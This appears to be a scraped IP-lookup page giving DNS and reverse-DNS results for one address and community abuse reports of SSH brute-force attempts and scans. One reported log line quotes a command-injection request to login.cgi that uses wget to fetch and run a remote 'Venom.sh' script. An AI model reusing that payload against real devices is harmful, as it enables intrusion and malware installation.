Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: United States

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 144.29.99.44
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 3474
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;144.29.99.44.			IN	A

;; AUTHORITY SECTION:
.			575	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022021702 1800 900 604800 86400

;; Query time: 21 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 18 12:31:12 CST 2022
;; MSG SIZE  rcvd: 105
Host info
b';; connection timed out; no servers could be reached
'
Nslookup info:
;; Truncated, retrying in TCP mode.
Server:		183.60.82.98
Address:	183.60.82.98#53

Non-authoritative answer:
44.99.29.144.in-addr.arpa	name = basfcc.com.br.
44.99.29.144.in-addr.arpa	name = momentosmagicossuvinil.com.br.
44.99.29.144.in-addr.arpa	name = basf-plastic.com.
44.99.29.144.in-addr.arpa	name = basfplastics.com.
44.99.29.144.in-addr.arpa	name = enertite.com.
44.99.29.144.in-addr.arpa	name = luransconstruction.com.
44.99.29.144.in-addr.arpa	name = permalath.com.
44.99.29.144.in-addr.arpa	name = corearquitetura.com.
44.99.29.144.in-addr.arpa	name = redir15.basf.us.
44.99.29.144.in-addr.arpa	name = optill.us.
44.99.29.144.in-addr.arpa	name = clearfieldsunflowers.com.
44.99.29.144.in-addr.arpa	name = basfpaintnews.com.
44.99.29.144.in-addr.arpa	name = beckerunderwood.com.
44.99.29.144.in-addr.arpa	name = optill.net.
44.99.29.144.in-addr.arpa	name = optillherbicide.us.
44.99.29.144.in-addr.arpa	name = epsfoam.info.
44.99.29.144.in-addr.arpa	name = micuenta.com.ar.
44.99.29.144.in-addr.arpa	name = isofoam.com.
44.99.29.144.in-addr.arpa	name = acronaloptive.com.
44.99.29.144.in-addr.arpa	name = basf-canada.com.
44.99.29.144.in-addr.arpa	name = agbciredir.basf.us.
44.99.29.144.in-addr.arpa	name = catalyst-selector.basf.com.
44.99.29.144.in-addr.arpa	name = basf-pfe.com.
44.99.29.144.in-addr.arpa	name = basf.cl.
44.99.29.144.in-addr.arpa	name = growsmartcorn.com.
44.99.29.144.in-addr.arpa	name = nexicorfungicide.com.
44.99.29.144.in-addr.arpa	name = verresta.us.
44.99.29.144.in-addr.arpa	name = visionplusonline.com.
44.99.29.144.in-addr.arpa	name = walltite.basf.com.
44.99.29.144.in-addr.arpa	name = engeniatankmix.com.
44.99.29.144.in-addr.arpa	name = treevixherbicide.com.
44.99.29.144.in-addr.arpa	name = redir5.basf.us.
44.99.29.144.in-addr.arpa	name = pbesupplier.org.
44.99.29.144.in-addr.arpa	name = carifend-net.com.
44.99.29.144.in-addr.arpa	name = powerfulcleaning.com.
44.99.29.144.in-addr.arpa	name = growsmartrewards.com.
44.99.29.144.in-addr.arpa	name = basf.com.ar.
44.99.29.144.in-addr.arpa	name = casa-s
Related IP info:
Related comments:
IP Type Details Datetime
167.172.64.238 attackspambots
Port 22 Scan, PTR: None
2019-12-23 16:15:57
58.218.66.88 attack
Unauthorized connection attempt from IP address 58.218.66.88 on Port 3306(MYSQL)
2019-12-23 16:39:53
118.101.192.81 attack
Dec 22 22:11:50 hanapaa sshd\[29516\]: Invalid user anita from 118.101.192.81
Dec 22 22:11:50 hanapaa sshd\[29516\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.101.192.81
Dec 22 22:11:53 hanapaa sshd\[29516\]: Failed password for invalid user anita from 118.101.192.81 port 20188 ssh2
Dec 22 22:17:59 hanapaa sshd\[30095\]: Invalid user ssh from 118.101.192.81
Dec 22 22:17:59 hanapaa sshd\[30095\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=118.101.192.81
2019-12-23 16:38:01
154.118.141.90 attackspam
<6 unauthorized SSH connections
2019-12-23 16:16:25
222.186.175.150 attack
Dec 23 08:57:54 h2779839 sshd[14941]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.175.150  user=root
Dec 23 08:57:56 h2779839 sshd[14941]: Failed password for root from 222.186.175.150 port 15854 ssh2
Dec 23 08:57:58 h2779839 sshd[14941]: Failed password for root from 222.186.175.150 port 15854 ssh2
Dec 23 08:57:54 h2779839 sshd[14941]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.175.150  user=root
Dec 23 08:57:56 h2779839 sshd[14941]: Failed password for root from 222.186.175.150 port 15854 ssh2
Dec 23 08:57:58 h2779839 sshd[14941]: Failed password for root from 222.186.175.150 port 15854 ssh2
Dec 23 08:57:54 h2779839 sshd[14941]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.175.150  user=root
Dec 23 08:57:56 h2779839 sshd[14941]: Failed password for root from 222.186.175.150 port 15854 ssh2
Dec 23 08:57:58 h2779839 sshd[14941]: Fai
...
2019-12-23 15:59:22
51.255.35.172 attackbots
51.255.35.172 - - [23/Dec/2019:08:10:23 +0000] "POST /wp/wp-login.php HTTP/1.1" 200 6239 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
51.255.35.172 - - [23/Dec/2019:08:10:23 +0000] "POST /wp/xmlrpc.php HTTP/1.1" 200 403 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"
...
2019-12-23 16:31:16
165.22.211.73 attackbots
2019-12-23T07:44:43.923870shield sshd\[995\]: Invalid user webmaster from 165.22.211.73 port 41350
2019-12-23T07:44:43.928126shield sshd\[995\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.211.73
2019-12-23T07:44:45.817368shield sshd\[995\]: Failed password for invalid user webmaster from 165.22.211.73 port 41350 ssh2
2019-12-23T07:50:51.385541shield sshd\[3266\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=165.22.211.73  user=root
2019-12-23T07:50:53.129121shield sshd\[3266\]: Failed password for root from 165.22.211.73 port 47762 ssh2
2019-12-23 16:05:31
41.42.192.186 attack
1 attack on wget probes like:
41.42.192.186 - - [23/Dec/2019:00:15:37 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 16:09:54
106.13.6.113 attackspam
Dec 23 07:29:06 ns381471 sshd[17232]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.6.113
Dec 23 07:29:08 ns381471 sshd[17232]: Failed password for invalid user yanagawa from 106.13.6.113 port 40084 ssh2
2019-12-23 16:24:24
112.85.42.171 attackspam
Dec 23 15:23:52 webhost01 sshd[2112]: Failed password for root from 112.85.42.171 port 50093 ssh2
Dec 23 15:24:05 webhost01 sshd[2112]: error: maximum authentication attempts exceeded for root from 112.85.42.171 port 50093 ssh2 [preauth]
...
2019-12-23 16:38:27
125.86.176.26 attack
Brute force attempt
2019-12-23 16:23:26
79.115.26.164 attack
Port 22 Scan, PTR: 79-115-26-164.rdsnet.ro.
2019-12-23 16:28:53
178.33.136.21 attackspam
Dec 22 21:45:35 wbs sshd\[16037\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.33.136.21  user=root
Dec 22 21:45:37 wbs sshd\[16037\]: Failed password for root from 178.33.136.21 port 59548 ssh2
Dec 22 21:50:47 wbs sshd\[16546\]: Invalid user asterisk from 178.33.136.21
Dec 22 21:50:47 wbs sshd\[16546\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.33.136.21
Dec 22 21:50:49 wbs sshd\[16546\]: Failed password for invalid user asterisk from 178.33.136.21 port 41230 ssh2
2019-12-23 16:38:51
182.52.28.58 attackbotsspam
1577082541 - 12/23/2019 07:29:01 Host: 182.52.28.58/182.52.28.58 Port: 445 TCP Blocked
2019-12-23 16:29:35
192.99.149.195 attackbotsspam
fail2ban honeypot
2019-12-23 16:35:34

Recently Reported IPs

144.26.2.9 144.30.2.72 144.30.169.13 144.34.186.230
144.32.123.53 144.34.199.250 144.34.247.61 144.46.111.101
144.34.74.155 144.43.243.208 144.48.116.24 144.34.74.159
144.42.99.224 144.48.140.11 144.41.103.105 144.48.109.92
144.48.117.136 144.37.5.45 144.48.140.12 144.48.140.153